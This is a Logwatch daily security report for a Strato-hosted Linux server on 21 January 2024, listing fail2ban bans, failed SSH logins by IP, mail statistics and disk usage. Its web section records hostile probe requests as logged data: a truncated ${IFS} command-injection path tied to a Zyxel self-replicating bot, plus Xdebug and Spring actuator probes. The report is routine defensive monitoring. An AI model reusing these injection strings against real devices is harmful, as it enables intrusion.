Logwatch for h2361197.stratoserver.net (Linux)

Montag, 22 Januar 2024


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Mon Jan 22 04:42:03 2024
        Date Range Processed: yesterday
                              ( 2024-Jan-21 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [115:114]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 A total of 4 sites probed the server 
    107.170.254.29
    162.243.146.17
    66.240.205.34
    89.190.156.61
 
 Requests with error response codes
    400 Bad Request
       null: 4 Time(s)
       *: 2 Time(s)
       /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 1 Time(s)
       mstshash=Administr: 1 Time(s)
    500 Internal Server Error
       /: 2 Time(s)
       /?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
       /actuator/gateway/routes: 1 Time(s)
    502 Bad Gateway
       /-UCiB4o_SaOfdBPLYtK8YA/pdf: 1 Time(s)
       /YsmARieUTPGHR1-N837aTg/pdf: 1 Time(s)
       /sq0-cswPQGi9pvVdOpDdOA/pdf: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       unknown (91.238.181.247): 42 Time(s)
       root (91.238.181.247): 16 Time(s)
       unknown (170.64.155.185): 12 Time(s)
       unknown (172.245.92.206): 11 Time(s)
       unknown (103.245.237.53): 9 Time(s)
       unknown (118.126.88.171): 9 Time(s)
       unknown (129.226.196.222): 9 Time(s)
       unknown (143.110.227.81): 9 Time(s)
       unknown (150.109.205.234): 9 Time(s)
       unknown (156.232.6.238): 9 Time(s)
       unknown (156.236.66.78): 9 Time(s)
       unknown (162.241.87.50): 9 Time(s)
       unknown (185.196.9.139): 9 Time(s)
       unknown (187.33.60.34): 9 Time(s)
       unknown (197.248.180.212): 9 Time(s)
       unknown (211.245.106.55): 9 Time(s)
       unknown (43.128.104.71): 9 Time(s)
       unknown (43.153.227.163): 9 Time(s)
       unknown (43.155.141.65): 9 Time(s)
       unknown (43.156.127.43): 9 Time(s)
       unknown (43.156.84.86): 9 Time(s)
       unknown (45.207.45.194): 9 Time(s)
       unknown (91.213.99.15): 9 Time(s)
       unknown (114.219.56.217): 8 Time(s)
       unknown (124.222.12.147): 8 Time(s)
       unknown (159.223.239.5): 8 Time(s)
       unknown (43.138.222.252): 8 Time(s)
       unknown (62.137.251.23.bc.googleusercontent.com): 8 Time(s)
       unknown (119.188.168.53): 7 Time(s)
       unknown (125.124.167.89): 7 Time(s)
       root (ns397054.ip-94-23-34.eu): 6 Time(s)
       unknown (1.15.171.183): 6 Time(s)
       unknown (112.132.249.164): 6 Time(s)
       unknown (115.159.25.59): 6 Time(s)
       unknown (124.223.219.43): 6 Time(s)
       unknown (36.133.64.211): 6 Time(s)
       unknown (149.167.39.19): 5 Time(s)
       unknown (212.70.149.150): 5 Time(s)
       root (183.107.151.167): 4 Time(s)
       unknown (122.252.225.103): 4 Time(s)
       unknown (43.128.107.195): 4 Time(s)
       unknown (43.155.157.138): 4 Time(s)
       unknown (138.99.6.179): 3 Time(s)
       unknown (162.62.218.43): 3 Time(s)
       unknown (180.109.252.41): 3 Time(s)
       unknown (43.133.60.251): 3 Time(s)
       unknown (43.134.64.85): 3 Time(s)
       unknown (43.156.68.36): 3 Time(s)
       unknown (41.59.82.183): 2 Time(s)
       bin (170.64.155.185): 1 Time(s)
       root (170.64.155.185): 1 Time(s)
       root (212.70.149.150): 1 Time(s)
       unknown (115.20.185.86): 1 Time(s)
       unknown (185.196.8.151): 1 Time(s)
       unknown (211-20-14-156.hinet-ip.hinet.net): 1 Time(s)
       unknown (216.66.35.177): 1 Time(s)
       unknown (8.140.53.65): 1 Time(s)
    Invalid Users:
       Unknown Account: 371 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

       75   Connections             
       27   Connections lost (inbound) 
       75   Disconnections          
 
        2   Timeouts (inbound)      
       17   SMTP dialog errors      
        2   Hostname verification errors (FCRDNS) 
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- Connections (secure-log) Begin ------------------------ 

 
 **Unmatched Entries**
    systemd-logind: New seat seat0.: 1 Time(s)
 
 ---------------------- Connections (secure-log) End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 SSHD Started: 2 Time(s)
 
 Disconnecting after too many authentication failures for user:
    invalid : 1 Time(s)
 
 Failed logins from:
    91.238.181.247: 16 times
    94.23.34.95 (ns397054.ip-94-23-34.eu): 6 times
    170.64.155.185: 2 times
    183.107.151.167: 5 times
    212.70.149.150: 1 time
 
 Illegal users from:
    undef: 245 times
    1.15.171.183: 6 times
    8.140.53.65: 1 time
    23.251.137.62 (62.137.251.23.bc.googleusercontent.com): 8 times
    36.133.64.211: 6 times
    41.59.82.183 (183.82-59-41.static-zone.ttcldata.net): 2 times
    43.128.104.71: 9 times
    43.128.107.195: 4 times
    43.133.60.251: 3 times
    43.134.64.85: 3 times
    43.138.222.252: 8 times
    43.153.227.163: 9 times
    43.155.141.65: 9 times
    43.155.157.138: 4 times
    43.156.68.36: 3 times
    43.156.84.86: 9 times
    43.156.127.43: 9 times
    45.207.45.194: 9 times
    52.87.199.75 (ec2-52-87-199-75.compute-1.amazonaws.com): 1 time
    91.213.99.15: 9 times
    91.238.181.247: 42 times
    103.245.237.53: 9 times
    112.132.249.164 (164.249.132.112.adsl-pool.ah.cnuninet.net): 6 times
    114.219.56.217: 8 times
    115.20.185.86: 5 times
    115.159.25.59: 6 times
    118.126.88.171: 9 times
    119.188.168.53: 7 times
    122.252.225.103: 4 times
    124.222.12.147: 8 times
    124.223.219.43: 6 times
    125.124.167.89: 7 times
    129.226.196.222: 9 times
    138.99.6.179 (host179.138-99-6.telmex.net.ar): 3 times
    143.110.227.81: 9 times
    149.167.39.19 (cpe-149-167-39-19.static.belong.com.au): 6 times
    150.109.205.234: 9 times
    156.232.6.238: 9 times
    156.236.66.78: 9 times
    159.223.239.5: 8 times
    162.62.218.43: 3 times
    162.241.87.50 (162-241-87-50.webhostbox.net): 9 times
    170.64.155.185: 12 times
    172.245.92.206 (172-245-92-206-host.colocrossing.com): 11 times
    180.109.252.41: 3 times
    185.196.8.151: 1 time
    185.196.9.139: 9 times
    187.33.60.34 (187.33.60.34.netone.com.br): 9 times
    197.248.180.212 (197-248-180-212.safaricombusiness.co.ke): 9 times
    211.20.14.156 (211-20-14-156.hinet-ip.hinet.net): 1 time
    211.245.106.55: 9 times
    212.70.149.150: 5 times
    216.66.35.177: 1 time
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop33632p1  394G  243G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016